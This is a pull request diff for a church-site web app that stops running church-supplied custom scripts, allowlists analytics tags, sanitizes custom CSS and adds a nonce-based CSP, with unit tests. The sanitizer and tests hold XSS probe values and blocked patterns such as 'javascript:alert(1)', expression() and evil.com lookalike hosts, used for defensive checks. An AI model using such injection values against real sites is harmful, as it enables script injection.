### PR TITLE
Stop executing church customJS; sanitize customCss; add CSP

### DIFF
--- a/next.config.mjs
+++ b/next.config.mjs
@@ -131,14 +131,40 @@ const nextConfig = {
   },
 
   async headers() {
+    // frame-ancestors lists Lessons/B1 embedders. Omitted X-Frame-Options: DENY because church sites are framed by Lessons and B1. frame-src is https: because WebsiteUrlPage, stream tabs, and sermon videoUrl embed church-chosen URLs.
+    const contentSecurityPolicy = [
+      "default-src 'self'",
+      "base-uri 'self'",
+      "object-src 'none'",
+      "img-src 'self' data: blob: https:",
+      "font-src 'self' data: https://fonts.gstatic.com https://storage.googleapis.com",
+      "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com",
+      "script-src 'self' 'unsafe-inline' https://www.googletagmanager.com https://www.google-analytics.com https://js.stripe.com https://www.google.com https://www.gstatic.com",
+      "connect-src 'self' https://*.churchapps.org https://*.b1.church https://*.lessons.church https://lessons.church https://www.google-analytics.com https://*.google-analytics.com https://analytics.google.com https://*.analytics.google.com https://www.googletagmanager.com https://*.googletagmanager.com https://*.ingest.us.sentry.io https://*.sentry.io https://*.stripe.com https://api.youversion.com https://*.youversion.com https://www.google.com https://www.gstatic.com wss://*.churchapps.org wss://*.b1.church",
+      "frame-src 'self' https:",
+      "frame-ancestors 'self' https://*.b1.church https://b1.church https://*.churchapps.org https://churchapps.org https://lessons.church https://*.lessons.church",
+      "worker-src 'self' blob:",
+      "media-src 'self' blob: https:",
+      "form-action 'self' https://*.churchapps.org https://*.stripe.com"
+    ].join("; ");
+
+    const securityHeaders = [
+      { key: "Strict-Transport-Security", value: "max-age=31536000; includeSubDomains" },
+      { key: "X-Content-Type-Options", value: "nosniff" },
+      { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" },
+      { key: "Content-Security-Policy", value: contentSecurityPolicy }
+    ];
+
     return [
       {
-        source: '/sw.js',
+        source: "/sw.js",
         headers: [
-          { key: 'Service-Worker-Allowed', value: '/' },
-          { key: 'Cache-Control', value: 'public, max-age=0, must-revalidate' },
-        ],
+          { key: "Service-Worker-Allowed", value: "/" },
+          { key: "Cache-Control", value: "public, max-age=0, must-revalidate" }
+        ]
       },
+      { source: "/", headers: securityHeaders },
+      { source: "/:path*", headers: securityHeaders }
     ];
   },
 

--- a/next.config.mjs
+++ b/next.config.mjs
@@ -131,28 +131,13 @@ const nextConfig = {
   },
 
   async headers() {
-    // frame-ancestors lists Lessons/B1 embedders. Omitted X-Frame-Options: DENY because church sites are framed by Lessons and B1. frame-src is https: because WebsiteUrlPage, stream tabs, and sermon videoUrl embed church-chosen URLs.
-    const contentSecurityPolicy = [
-      "default-src 'self'",
-      "base-uri 'self'",
-      "object-src 'none'",
-      "img-src 'self' data: blob: https:",
-      "font-src 'self' data: https://fonts.gstatic.com https://storage.googleapis.com",
-      "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com",
-      "script-src 'self' 'unsafe-inline' https://www.googletagmanager.com https://www.google-analytics.com https://js.stripe.com https://www.google.com https://www.gstatic.com",
-      "connect-src 'self' https://*.churchapps.org https://*.b1.church https://*.lessons.church https://lessons.church https://www.google-analytics.com https://*.google-analytics.com https://analytics.google.com https://*.analytics.google.com https://www.googletagmanager.com https://*.googletagmanager.com https://*.ingest.us.sentry.io https://*.sentry.io https://*.stripe.com https://api.youversion.com https://*.youversion.com https://www.google.com https://www.gstatic.com wss://*.churchapps.org wss://*.b1.church",
-      "frame-src 'self' https:",
-      "frame-ancestors 'self' https://*.b1.church https://b1.church https://*.churchapps.org https://churchapps.org https://lessons.church https://*.lessons.church",
-      "worker-src 'self' blob:",
-      "media-src 'self' blob: https:",
-      "form-action 'self' https://*.churchapps.org https://*.stripe.com"
-    ].join("; ");
-
+    // Content-Security-Policy is not set here: it needs a per-request nonce so
+    // script-src can drop 'unsafe-inline', which only middleware can issue.
+    // See src/helpers/contentSecurityPolicy.ts and src/middleware.ts.
     const securityHeaders = [
       { key: "Strict-Transport-Security", value: "max-age=31536000; includeSubDomains" },
       { key: "X-Content-Type-Options", value: "nosniff" },
-      { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" },
-      { key: "Content-Security-Policy", value: contentSecurityPolicy }
+      { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" }
     ];
 
     return [

--- a/package.json
+++ b/package.json
@@ -18,6 +18,7 @@
     "lint": "eslint --fix src/",
     "pretest": "node tests/setup/pretest.mjs",
     "test": "playwright test",
+    "test:unit": "node --experimental-strip-types --test tests/unit/customContentSecurity.test.ts",
     "test:headed": "playwright test --headed",
     "test:ui": "playwright test --ui",
     "test:debug": "playwright test --debug",

--- a/package.json
+++ b/package.json
@@ -18,7 +18,7 @@
     "lint": "eslint --fix src/",
     "pretest": "node tests/setup/pretest.mjs",
     "test": "playwright test",
-    "test:unit": "node --experimental-strip-types --test tests/unit/customContentSecurity.test.ts",
+    "test:unit": "node --experimental-strip-types --test tests/unit/contentSecurityPolicy.test.ts tests/unit/customContentSecurity.test.ts",
     "test:headed": "playwright test --headed",
     "test:ui": "playwright test --ui",
     "test:debug": "playwright test --debug",

--- a/src/app/localhost/layout.tsx
+++ b/src/app/localhost/layout.tsx
@@ -1,0 +1,10 @@
+import React from "react";
+
+// Rendered per request so the CSP nonce issued in middleware reaches the
+// scripts Next injects. A prerendered copy would ship without a nonce and its
+// bootstrap scripts would be blocked by script-src.
+export const dynamic = "force-dynamic";
+
+export default function LocalhostLayout({ children }: { children: React.ReactNode }) {
+  return <>{children}</>;
+}

--- a/src/app/socialSuggestions/layout.tsx
+++ b/src/app/socialSuggestions/layout.tsx
@@ -1,0 +1,10 @@
+import React from "react";
+
+// Rendered per request so the CSP nonce issued in middleware reaches the
+// scripts Next injects. A prerendered copy would ship without a nonce and its
+// bootstrap scripts would be blocked by script-src.
+export const dynamic = "force-dynamic";
+
+export default function SocialSuggestionsLayout({ children }: { children: React.ReactNode }) {
+  return <>{children}</>;
+}

--- a/src/components/ChurchAnalytics.tsx
+++ b/src/components/ChurchAnalytics.tsx
@@ -1,7 +1,11 @@
 import Script from "next/script";
+import { isAllowedMeasurementId } from "@/helpers/customContentSecurity";
 
 export function ChurchAnalytics({ measurementId }: { measurementId?: string | null }) {
-  if (!measurementId) return null;
+  // ga4MeasurementId is church-editable content, and it lands inside an inline
+  // script that carries the CSP nonce, so anything but a real GA/GTM id is a
+  // script-injection sink.
+  if (!measurementId || !isAllowedMeasurementId(measurementId)) return null;
   return (
     <>
       <Script strategy="afterInteractive" src={`https://www.googletagmanager.com/gtag/js?id=${measurementId}`} />

--- a/src/components/Theme.tsx
+++ b/src/components/Theme.tsx
@@ -2,6 +2,7 @@
 
 import { ConfigurationInterface } from "@/helpers/ConfigHelper";
 import { accent as deriveAccent, isValidHex, shade, tint } from "@/helpers/colorTints";
+import { gtagLoaderSrc, parseCustomJs, sanitizeCustomCss } from "@/helpers/customContentSecurity";
 import React from "react";
 
 interface Props { config: ConfigurationInterface }
@@ -94,7 +95,8 @@ export const Theme: React.FC<Props> = (props) => {
     } catch { /* malformed JSON */ }
   }
 
-  if (props.config.globalStyles?.customCss) lines.push(props.config.globalStyles?.customCss);
+  const customCss = sanitizeCustomCss(props.config.globalStyles?.customCss || "");
+  if (customCss) lines.push(customCss);
 
   const css = ":root { " + lines.join("\n") + " } " + navRules.join("\n");
 
@@ -106,20 +108,37 @@ export const Theme: React.FC<Props> = (props) => {
     googleFontsUrl = "https://fonts.googleapis.com/css2?family=" + fontList.join("&family=") + "&display=swap";
   }
 
-  // Execute customJS scripts properly — dangerouslySetInnerHTML doesn't execute <script> tags
   const customJsRef = React.useRef<HTMLDivElement>(null);
   React.useEffect(() => {
+    const root = customJsRef.current;
+    if (!root) return;
+    root.replaceChildren();
     const customJS = props?.config?.globalStyles?.customJS;
-    if (!customJS || !customJsRef.current) return;
-    const container = customJsRef.current;
-    container.innerHTML = customJS;
-    const scripts = container.querySelectorAll("script");
-    scripts.forEach((orig) => {
+    if (!customJS) return;
+    const { externalScripts, measurementIds } = parseCustomJs(customJS);
+    const w = window as Window & { dataLayer?: unknown[]; gtag?: (...args: unknown[]) => void };
+    w.dataLayer = w.dataLayer || [];
+    if (typeof w.gtag !== "function") w.gtag = function gtag() { w.dataLayer!.push(arguments); };
+    for (const item of externalScripts) {
       const script = document.createElement("script");
-      orig.getAttributeNames().forEach((name) => { script.setAttribute(name, orig.getAttribute(name) || ""); });
-      if (orig.textContent) script.textContent = orig.textContent;
-      orig.replaceWith(script);
-    });
+      script.src = item.src;
+      if (item.async) script.async = true;
+      if (item.defer) script.defer = true;
+      root.appendChild(script);
+    }
+    for (const id of measurementIds) {
+      const src = gtagLoaderSrc(id);
+      if (src && !document.querySelector(`script[src="${src}"]`) && !externalScripts.some((s) => s.src === src || s.src.startsWith(src))) {
+        const script = document.createElement("script");
+        script.src = src;
+        script.async = true;
+        root.appendChild(script);
+      }
+      if (id.startsWith("G-")) {
+        w.gtag("js", new Date());
+        w.gtag("config", id);
+      }
+    }
   }, [props?.config?.globalStyles?.customJS]);
 
   return (<>

--- a/src/helpers/contentSecurityPolicy.ts
+++ b/src/helpers/contentSecurityPolicy.ts
@@ -1,0 +1,104 @@
+// Content-Security-Policy for church-facing B1App responses.
+//
+// script-src carries a per-request nonce issued by middleware instead of
+// 'unsafe-inline'. Next injects that nonce into its own bootstrap/streaming
+// scripts and into <Script> tags, so first-party JS still runs while anything
+// injected into the HTML (church customJS, stored XSS) does not.
+//
+// style-src keeps 'unsafe-inline'. A nonce cannot authorize a style *attribute*,
+// and React/MUI set element style props all over the app, so dropping it would
+// break rendering rather than harden it. customCss is sanitized in Theme before
+// it reaches the page; @import is limited to STYLE_SRC_HOSTS.
+//
+// frame-ancestors lists the Lessons/B1 embedders instead of X-Frame-Options:
+// DENY because church sites are legitimately framed by Lessons and B1.
+// frame-src stays broad (https:) because WebsiteUrlPage, stream interaction
+// tabs, and sermon videoUrl embed church-chosen URLs.
+
+export const SCRIPT_SRC_HOSTS = [
+  "https://www.googletagmanager.com",
+  "https://www.google-analytics.com",
+  "https://js.stripe.com",
+  "https://www.google.com",
+  "https://www.gstatic.com"
+] as const;
+
+export const STYLE_SRC_HOSTS = ["https://fonts.googleapis.com"] as const;
+
+export const FONT_SRC_HOSTS = ["https://fonts.gstatic.com", "https://storage.googleapis.com"] as const;
+
+export const CONNECT_SRC_HOSTS = [
+  "https://*.churchapps.org",
+  "https://*.b1.church",
+  "https://*.lessons.church",
+  "https://lessons.church",
+  "https://www.google-analytics.com",
+  "https://*.google-analytics.com",
+  "https://analytics.google.com",
+  "https://*.analytics.google.com",
+  "https://www.googletagmanager.com",
+  "https://*.googletagmanager.com",
+  "https://*.ingest.us.sentry.io",
+  "https://*.sentry.io",
+  "https://*.stripe.com",
+  "https://api.youversion.com",
+  "https://*.youversion.com",
+  "https://www.google.com",
+  "https://www.gstatic.com",
+  "wss://*.churchapps.org",
+  "wss://*.b1.church"
+] as const;
+
+export const FRAME_ANCESTORS = [
+  "'self'",
+  "https://*.b1.church",
+  "https://b1.church",
+  "https://*.churchapps.org",
+  "https://churchapps.org",
+  "https://lessons.church",
+  "https://*.lessons.church"
+] as const;
+
+export const FORM_ACTION = ["'self'", "https://*.churchapps.org", "https://*.stripe.com"] as const;
+
+// next dev compiles with eval-based source maps and talks to the local API /
+// websocket stack on other ports. Those relaxations never ship to production.
+const DEV_SCRIPT_SRC = ["'unsafe-eval'"];
+const DEV_CONNECT_SRC = ["http://localhost:*", "http://127.0.0.1:*", "http://*.localtest.me:*", "ws://localhost:*", "ws://127.0.0.1:*", "ws://*.localtest.me:*"];
+
+export interface CspOptions {
+  nonce?: string;
+  dev?: boolean;
+}
+
+export const buildContentSecurityPolicy = (options: CspOptions = {}): string => {
+  const { nonce, dev = false } = options;
+
+  const scriptSrc = ["'self'", ...(nonce ? [`'nonce-${nonce}'`] : []), ...SCRIPT_SRC_HOSTS, ...(dev ? DEV_SCRIPT_SRC : [])];
+  const connectSrc = ["'self'", ...CONNECT_SRC_HOSTS, ...(dev ? DEV_CONNECT_SRC : [])];
+
+  return [
+    "default-src 'self'",
+    "base-uri 'self'",
+    "object-src 'none'",
+    "img-src 'self' data: blob: https:",
+    "font-src 'self' data: " + FONT_SRC_HOSTS.join(" "),
+    "style-src 'self' 'unsafe-inline' " + STYLE_SRC_HOSTS.join(" "),
+    "script-src " + scriptSrc.join(" "),
+    "connect-src " + connectSrc.join(" "),
+    "frame-src 'self' https:",
+    "frame-ancestors " + FRAME_ANCESTORS.join(" "),
+    "worker-src 'self' blob:",
+    "media-src 'self' blob: https:",
+    "form-action " + FORM_ACTION.join(" ")
+  ].join("; ");
+};
+
+// base64 per the CSP nonce-source grammar; 128 bits of entropy per response.
+export const generateNonce = (): string => {
+  const bytes = new Uint8Array(16);
+  crypto.getRandomValues(bytes);
+  let binary = "";
+  for (const b of bytes) binary += String.fromCharCode(b);
+  return btoa(binary);
+};

--- a/src/helpers/customContentSecurity.ts
+++ b/src/helpers/customContentSecurity.ts
@@ -131,16 +131,48 @@ export const gtagLoaderSrc = (id: string): string | null => {
   return "https://www.googletagmanager.com/gtag/js?id=" + encodeURIComponent(id);
 };
 
+// Hostnames an @import may point at. Keep in sync with STYLE_SRC_HOSTS in
+// contentSecurityPolicy.ts — CSP blocks anything else anyway, so allowing more
+// here would only produce stylesheets that silently fail to load.
+export const ALLOWED_STYLE_IMPORT_HOSTS = ["fonts.googleapis.com"] as const;
+
+const CSS_STRIP_PATTERNS = [
+  /<\/?[a-zA-Z][^>]*>/g, // HTML tags
+  /<\/style/gi, // unterminated </style breakout
+  /expression\s*\(/gi, // legacy IE expression()
+  /-moz-binding/gi, // XBL binding
+  /behavior\s*:/gi, // IE behavior:
+  /url\s*\(\s*['"]?\s*javascript\s*:/gi
+];
+
+const importHref = (stmt: string): string =>
+  (stmt.match(/url\s*\(\s*['"]?([^'")\s]+)['"]?\s*\)/i) || stmt.match(/@import\s+['"]([^'"]+)['"]/i))?.[1] || "";
+
+const isAllowedCssImport = (stmt: string): boolean => {
+  const href = importHref(stmt);
+  if (!href) return false;
+  try {
+    const url = new URL(href);
+    if (url.protocol !== "https:" || url.username || url.password) return false;
+    return (ALLOWED_STYLE_IMPORT_HOSTS as readonly string[]).includes(url.hostname.toLowerCase());
+  } catch {
+    return false;
+  }
+};
+
 export const sanitizeCustomCss = (css: string): string => {
   if (!css) return "";
-  let out = css.replace(/<\/?[a-zA-Z][^>]*>/g, "");
-  out = out.replace(/<\/style/gi, "");
-  out = out.replace(/expression\s*\(/gi, "");
-  out = out.replace(/-moz-binding/gi, "");
-  out = out.replace(/url\s*\(\s*['"]?\s*javascript\s*:/gi, "");
-  out = out.replace(/@import\b[^;]*;?/gi, (stmt) => {
-    const href = (stmt.match(/url\s*\(\s*['"]?([^'")\s]+)['"]?\s*\)/i) || stmt.match(/@import\s+['"]([^'"]+)['"]/i))?.[1] || "";
-    return /^https:\/\//i.test(href) ? stmt : "";
-  });
+  let out = css;
+  let prev = "";
+  // Loop to a fixed point: a single pass lets nested payloads such as
+  // "expexpression(ression(" reassemble into the very token being stripped.
+  while (out !== prev) {
+    prev = out;
+    for (const pattern of CSS_STRIP_PATTERNS) {
+      pattern.lastIndex = 0;
+      out = out.replace(pattern, "");
+    }
+    out = out.replace(/@import\b[^;]*;?/gi, (stmt) => (isAllowedCssImport(stmt) ? stmt : ""));
+  }
   return out;
 };

--- a/src/helpers/customContentSecurity.ts
+++ b/src/helpers/customContentSecurity.ts
@@ -1,0 +1,146 @@
+export const ALLOWED_SCRIPT_HOSTS = ["www.googletagmanager.com", "www.google-analytics.com"] as const;
+
+const MEASUREMENT_ID_RE = /^(?:G|GTM)-[A-Z0-9-]+$/;
+const MEASUREMENT_ID_FIND_RE = /\b((?:G|GTM)-[A-Z0-9-]+)\b/g;
+const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
+const ATTR_RE = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>=]+)))?/g;
+
+export type AllowedExternalScript = { src: string; async: boolean; defer: boolean };
+
+export type ParsedCustomJs = { externalScripts: AllowedExternalScript[]; measurementIds: string[] };
+
+export const isAllowedMeasurementId = (id: string): boolean => MEASUREMENT_ID_RE.test(id);
+
+export const isAllowedScriptSrc = (src: string): boolean => {
+  try {
+    const url = new URL(src.trim());
+    if (url.protocol !== "https:") return false;
+    if (url.username || url.password) return false;
+    return (ALLOWED_SCRIPT_HOSTS as readonly string[]).includes(url.hostname.toLowerCase());
+  } catch {
+    return false;
+  }
+};
+
+const parseHtmlAttrs = (attrStr: string): Record<string, string> => {
+  const attrs: Record<string, string> = {};
+  ATTR_RE.lastIndex = 0;
+  let m: RegExpExecArray | null;
+  while ((m = ATTR_RE.exec(attrStr)) !== null) {
+    const name = m[1].toLowerCase();
+    if (name === "/" || name.startsWith("on")) continue;
+    attrs[name] = m[2] ?? m[3] ?? m[4] ?? "";
+  }
+  return attrs;
+};
+
+const uniqueIds = (ids: string[]): string[] => {
+  const seen = new Set<string>();
+  const out: string[] = [];
+  for (const id of ids) {
+    if (!isAllowedMeasurementId(id) || seen.has(id)) continue;
+    seen.add(id);
+    out.push(id);
+  }
+  return out;
+};
+
+const findMeasurementIds = (text: string): string[] => {
+  const ids: string[] = [];
+  MEASUREMENT_ID_FIND_RE.lastIndex = 0;
+  let m: RegExpExecArray | null;
+  while ((m = MEASUREMENT_ID_FIND_RE.exec(text)) !== null) ids.push(m[1]);
+  return uniqueIds(ids);
+};
+
+const idFromSrc = (src: string): string | undefined => {
+  try {
+    const id = new URL(src).searchParams.get("id") || "";
+    return isAllowedMeasurementId(id) ? id : undefined;
+  } catch {
+    return undefined;
+  }
+};
+
+const GTAG_BOOTSTRAP_PATTERNS = [
+  /window\.dataLayer\s*=\s*window\.dataLayer\s*\|\|\s*\[\s*\]\s*;?/g,
+  /var\s+dataLayer\s*=\s*(?:window\.)?dataLayer\s*\|\|\s*\[\s*\]\s*;?/g,
+  /function\s+gtag\s*\(\s*\)\s*\{\s*(?:window\.)?dataLayer\.push\(arguments\)\s*;?\s*\}/g,
+  /window\.gtag\s*=\s*function\s*\(\s*\)\s*\{\s*(?:window\.)?dataLayer\.push\(arguments\)\s*;?\s*\}/g,
+  /gtag\s*\(\s*['"]js['"]\s*,\s*new\s+Date\(\s*\)\s*\)\s*;?/g,
+  /gtag\s*\(\s*['"]config['"]\s*,\s*['"](?:G|GTM)-[A-Z0-9-]+['"]\s*(?:,\s*\{[\s\S]*?\})?\s*\)\s*;?/g
+];
+
+export const isAllowedGtagInline = (code: string): boolean => {
+  let s = code.replace(/<!--[\s\S]*?-->/g, "").replace(/\/\*[\s\S]*?\*\//g, "").trim();
+  if (!s) return false;
+  let prev = "";
+  while (s !== prev) {
+    prev = s;
+    for (const p of GTAG_BOOTSTRAP_PATTERNS) {
+      p.lastIndex = 0;
+      s = s.replace(p, "");
+    }
+    s = s.replace(/\s+/g, " ").trim();
+  }
+  return s === "" && findMeasurementIds(code).length > 0;
+};
+
+const GTM_SNIPPET_RE = /^\s*\(function\s*\(\s*w\s*,\s*d\s*,\s*s\s*,\s*l\s*,\s*i\s*\)\s*\{[\s\S]*https:\/\/www\.googletagmanager\.com\/gtm\.js\?id=['"]?\s*\+\s*i[\s\S]*\}\)\s*\(\s*window\s*,\s*document\s*,\s*['"]script['"]\s*,\s*['"]dataLayer['"]\s*,\s*['"](GTM-[A-Z0-9-]+)['"]\s*\)\s*;?\s*$/;
+
+export const isAllowedGtmInline = (code: string): boolean => {
+  const s = code.replace(/<!--[\s\S]*?-->/g, "").trim();
+  if (!GTM_SNIPPET_RE.test(s)) return false;
+  const urls = s.match(/https?:\/\/[^\s'"+]+/gi) || [];
+  return urls.every((u) => {
+    try {
+      return new URL(u).hostname.toLowerCase() === "www.googletagmanager.com";
+    } catch {
+      return false;
+    }
+  });
+};
+
+export const parseCustomJs = (html: string): ParsedCustomJs => {
+  const externalScripts: AllowedExternalScript[] = [];
+  const measurementIds: string[] = [];
+  if (!html) return { externalScripts, measurementIds };
+
+  SCRIPT_RE.lastIndex = 0;
+  let m: RegExpExecArray | null;
+  while ((m = SCRIPT_RE.exec(html)) !== null) {
+    const attrs = parseHtmlAttrs(m[1] || "");
+    const src = (attrs.src || "").trim();
+    const body = m[2] || "";
+    if (src) {
+      if (!isAllowedScriptSrc(src)) continue;
+      externalScripts.push({ src, async: Object.prototype.hasOwnProperty.call(attrs, "async"), defer: Object.prototype.hasOwnProperty.call(attrs, "defer") });
+      const fromSrc = idFromSrc(src);
+      if (fromSrc) measurementIds.push(fromSrc);
+      continue;
+    }
+    if (isAllowedGtagInline(body) || isAllowedGtmInline(body)) measurementIds.push(...findMeasurementIds(body));
+  }
+
+  return { externalScripts, measurementIds: uniqueIds(measurementIds) };
+};
+
+export const gtagLoaderSrc = (id: string): string | null => {
+  if (!isAllowedMeasurementId(id)) return null;
+  if (id.startsWith("GTM-")) return "https://www.googletagmanager.com/gtm.js?id=" + encodeURIComponent(id);
+  return "https://www.googletagmanager.com/gtag/js?id=" + encodeURIComponent(id);
+};
+
+export const sanitizeCustomCss = (css: string): string => {
+  if (!css) return "";
+  let out = css.replace(/<\/?[a-zA-Z][^>]*>/g, "");
+  out = out.replace(/<\/style/gi, "");
+  out = out.replace(/expression\s*\(/gi, "");
+  out = out.replace(/-moz-binding/gi, "");
+  out = out.replace(/url\s*\(\s*['"]?\s*javascript\s*:/gi, "");
+  out = out.replace(/@import\b[^;]*;?/gi, (stmt) => {
+    const href = (stmt.match(/url\s*\(\s*['"]?([^'")\s]+)['"]?\s*\)/i) || stmt.match(/@import\s+['"]([^'"]+)['"]/i))?.[1] || "";
+    return /^https:\/\//i.test(href) ? stmt : "";
+  });
+  return out;
+};

--- a/src/helpers/index.ts
+++ b/src/helpers/index.ts
@@ -8,6 +8,7 @@ export { AppBadgeHelper, setAppBadge, clearAppBadge } from "./AppBadgeHelper";
 export { InstallPromptHelper } from "./InstallPromptHelper";
 export { formatNotificationError, getSocketDiagnostics } from "./NotificationRuntimeHelper";
 export { isLinkVisible, filterVisibleLinks } from "./VisibilityHelper";
+export { parseCustomJs, sanitizeCustomCss, ALLOWED_SCRIPT_HOSTS } from "./customContentSecurity";
 export { PlanHelper } from "@churchapps/helpers";
 
 export * from "./interfaces";

--- a/src/middleware.ts
+++ b/src/middleware.ts
@@ -1,4 +1,5 @@
 import { NextRequest, NextResponse } from "next/server";
+import { buildContentSecurityPolicy, generateNonce } from "@/helpers/contentSecurityPolicy";
 import { isNoindexHost } from "@/helpers/noindexHost";
 
 const INTERNAL_HOSTS = ["localhost", "b1.church", "localtest.me"];
@@ -21,6 +22,12 @@ export async function middleware(req: NextRequest) {
   const headers = new Headers(req.headers);
   headers.delete("x-site"); // never trust a client-supplied x-site (spoofable rewrite input)
 
+  // Next reads the nonce off the request-side CSP header and stamps it onto the
+  // scripts it renders, which is what lets script-src drop 'unsafe-inline'.
+  const nonce = generateNonce();
+  const csp = buildContentSecurityPolicy({ nonce, dev: process.env.NODE_ENV !== "production" });
+  headers.set("Content-Security-Policy", csp);
+
   if (!isInternal) {
     let entry = cache.get(host);
     if (!entry || entry.exp < Date.now()) {
@@ -38,6 +45,7 @@ export async function middleware(req: NextRequest) {
     if (entry.site) headers.set("x-site", entry.site);
   }
   const res = NextResponse.next({ request: { headers } });
+  res.headers.set("Content-Security-Policy", csp);
   if (isNoindexHost(host)) res.headers.set("X-Robots-Tag", "noindex, nofollow");
   return res;
 }

--- a/tests/unit/contentSecurityPolicy.test.ts
+++ b/tests/unit/contentSecurityPolicy.test.ts
@@ -1,0 +1,82 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import { buildContentSecurityPolicy, generateNonce, STYLE_SRC_HOSTS } from "../../src/helpers/contentSecurityPolicy.ts";
+import { ALLOWED_STYLE_IMPORT_HOSTS } from "../../src/helpers/customContentSecurity.ts";
+
+const directive = (csp: string, name: string): string => {
+  const found = csp.split("; ").find((d) => d === name || d.startsWith(name + " "));
+  assert.ok(found, `missing ${name} in ${csp}`);
+  return found;
+};
+
+describe("buildContentSecurityPolicy", () => {
+  it("uses a nonce instead of 'unsafe-inline' for scripts", () => {
+    const csp = buildContentSecurityPolicy({ nonce: "abc123==" });
+    const scriptSrc = directive(csp, "script-src");
+    assert.ok(scriptSrc.includes("'nonce-abc123=='"));
+    assert.equal(scriptSrc.includes("'unsafe-inline'"), false);
+    assert.equal(scriptSrc.includes("'unsafe-eval'"), false);
+    assert.equal(scriptSrc.includes("'strict-dynamic'"), false);
+  });
+
+  it("never emits 'unsafe-inline' or 'unsafe-eval' for scripts, even without a nonce", () => {
+    const scriptSrc = directive(buildContentSecurityPolicy(), "script-src");
+    assert.equal(scriptSrc, "script-src 'self' https://www.googletagmanager.com https://www.google-analytics.com https://js.stripe.com https://www.google.com https://www.gstatic.com");
+  });
+
+  it("relaxes only dev-server needs when dev is set", () => {
+    const dev = buildContentSecurityPolicy({ nonce: "n", dev: true });
+    assert.ok(directive(dev, "script-src").includes("'unsafe-eval'"));
+    assert.equal(directive(dev, "script-src").includes("'unsafe-inline'"), false);
+    assert.ok(directive(dev, "connect-src").includes("http://localhost:*"));
+    assert.ok(directive(dev, "connect-src").includes("ws://localhost:*"));
+    assert.equal(directive(buildContentSecurityPolicy({ nonce: "n" }), "connect-src").includes("localhost"), false);
+  });
+
+  it("keeps the locked-down base directives", () => {
+    const csp = buildContentSecurityPolicy({ nonce: "n" });
+    assert.equal(directive(csp, "default-src"), "default-src 'self'");
+    assert.equal(directive(csp, "base-uri"), "base-uri 'self'");
+    assert.equal(directive(csp, "object-src"), "object-src 'none'");
+    assert.equal(directive(csp, "worker-src"), "worker-src 'self' blob:");
+    assert.ok(directive(csp, "form-action").startsWith("form-action 'self'"));
+  });
+
+  it("allows the Lessons/B1 embedders as frame-ancestors", () => {
+    const frameAncestors = directive(buildContentSecurityPolicy(), "frame-ancestors");
+    for (const host of ["'self'", "https://b1.church", "https://*.b1.church", "https://lessons.church", "https://*.lessons.church"]) {
+      assert.ok(frameAncestors.includes(host), `frame-ancestors missing ${host}`);
+    }
+  });
+
+  it("allows GA/GTM and payment scripts but no other third-party widgets", () => {
+    const scriptSrc = directive(buildContentSecurityPolicy({ nonce: "n" }), "script-src");
+    assert.ok(scriptSrc.includes("https://www.googletagmanager.com"));
+    assert.ok(scriptSrc.includes("https://www.google-analytics.com"));
+    assert.ok(scriptSrc.includes("https://js.stripe.com"));
+    // Meta Pixel / Crisp / Intercom stay blocked; re-enabling them is a deliberate decision, not a drive-by edit.
+    for (const host of ["facebook", "crisp", "intercom", "hotjar", "tawk"]) {
+      assert.equal(scriptSrc.includes(host), false, `script-src should not allow ${host}`);
+    }
+  });
+
+  it("keeps style-src inline (React style attributes) and matches the CSS @import allowlist", () => {
+    const styleSrc = directive(buildContentSecurityPolicy({ nonce: "n" }), "style-src");
+    assert.ok(styleSrc.includes("'unsafe-inline'"));
+    for (const host of ALLOWED_STYLE_IMPORT_HOSTS) {
+      assert.ok(STYLE_SRC_HOSTS.some((origin) => new URL(origin).hostname === host), `style-src must cover @import host ${host}`);
+      assert.ok(styleSrc.includes(host));
+    }
+  });
+});
+
+describe("generateNonce", () => {
+  it("returns unique base64 values", () => {
+    const values = new Set(Array.from({ length: 50 }, () => generateNonce()));
+    assert.equal(values.size, 50);
+    for (const value of values) {
+      assert.match(value, /^[A-Za-z0-9+/]+={0,2}$/);
+      assert.equal(atob(value).length, 16);
+    }
+  });
+});

--- a/tests/unit/customContentSecurity.test.ts
+++ b/tests/unit/customContentSecurity.test.ts
@@ -1,0 +1,105 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import { gtagLoaderSrc, isAllowedGtagInline, isAllowedScriptSrc, parseCustomJs, sanitizeCustomCss } from "../../src/helpers/customContentSecurity.ts";
+
+const GA_SNIPPET = `<script async src="https://www.googletagmanager.com/gtag/js?id=G-ABC123XYZ"></script>
+<script>
+  window.dataLayer = window.dataLayer || [];
+  function gtag(){dataLayer.push(arguments);}
+  gtag('js', new Date());
+  gtag('config', 'G-ABC123XYZ');
+</script>`;
+
+const GTM_SNIPPET = `<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
+new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
+j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
+'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
+})(window,document,'script','dataLayer','GTM-NYC1');</script>`;
+
+describe("isAllowedScriptSrc", () => {
+  it("allows https gtag and analytics hosts", () => {
+    assert.equal(isAllowedScriptSrc("https://www.googletagmanager.com/gtag/js?id=G-ABC123XYZ"), true);
+    assert.equal(isAllowedScriptSrc("https://www.google-analytics.com/analytics.js"), true);
+  });
+
+  it("denies non-allowlisted and non-https sources", () => {
+    assert.equal(isAllowedScriptSrc("https://connect.facebook.net/en_US/fbevents.js"), false);
+    assert.equal(isAllowedScriptSrc("https://client.crisp.chat/l.js"), false);
+    assert.equal(isAllowedScriptSrc("https://widget.intercom.io/widget/abc"), false);
+    assert.equal(isAllowedScriptSrc("http://www.googletagmanager.com/gtag/js?id=G-ABC123XYZ"), false);
+    assert.equal(isAllowedScriptSrc("https://www.googletagmanager.com.evil.com/gtag/js"), false);
+    assert.equal(isAllowedScriptSrc("https://evil.com/www.googletagmanager.com/gtag/js"), false);
+    assert.equal(isAllowedScriptSrc("javascript:alert(1)"), false);
+    assert.equal(isAllowedScriptSrc("//www.googletagmanager.com/gtag/js"), false);
